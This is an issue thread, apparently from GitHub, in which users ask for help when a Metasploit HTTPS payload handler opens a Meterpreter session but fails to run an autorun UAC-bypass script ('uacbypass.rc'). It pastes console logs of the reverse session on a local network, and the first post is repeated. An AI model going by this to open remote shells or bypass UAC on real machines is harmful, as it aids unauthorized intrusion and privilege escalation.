Closed xiaoparrot closed 6 years ago
excuse me! when i run https payload, msf have some problem...
msf exploit(handler) > [] https://0.0.0.0:443 handling request from 192.168.68.107; (UUID: qm4sjpn0) Staging x86 payload (172627 bytes) ... [] Meterpreter session 1 opened (192.168.68.101:443 -> 192.168.68.107:3472) at 2017-09-04 14:45:30 +0800 [+] negotiating tlv encryption [+] negotiated tlv encryption [+] negotiated tlv encryption [] Session ID 1 (192.168.68.101:443 -> 192.168.68.107:3472) processing AutoRunScript 'multi_console_command -rc uacbypass.rc' ([] Running Command List ... [*] Running command uacbypass.rc [-] Unknown command: uacbypass.rc.) ................. it can run ,but i dont know what.
Sir i also facing same problem Is your problem solved if yes plz kindly help me out of this
How you fix it?
excuse me! when i run https payload, msf have some problem...
msf exploit(handler) > [] https://0.0.0.0:443 handling request from 192.168.68.107; (UUID: qm4sjpn0) Staging x86 payload (172627 bytes) ... [] Meterpreter session 1 opened (192.168.68.101:443 -> 192.168.68.107:3472) at 2017-09-04 14:45:30 +0800 [+] negotiating tlv encryption [+] negotiated tlv encryption [+] negotiated tlv encryption [] Session ID 1 (192.168.68.101:443 -> 192.168.68.107:3472) processing AutoRunScript 'multi_console_command -rc uacbypass.rc' ([] Running Command List ... [*] Running command uacbypass.rc [-] Unknown command: uacbypass.rc.) ................. it can run ,but i dont know what.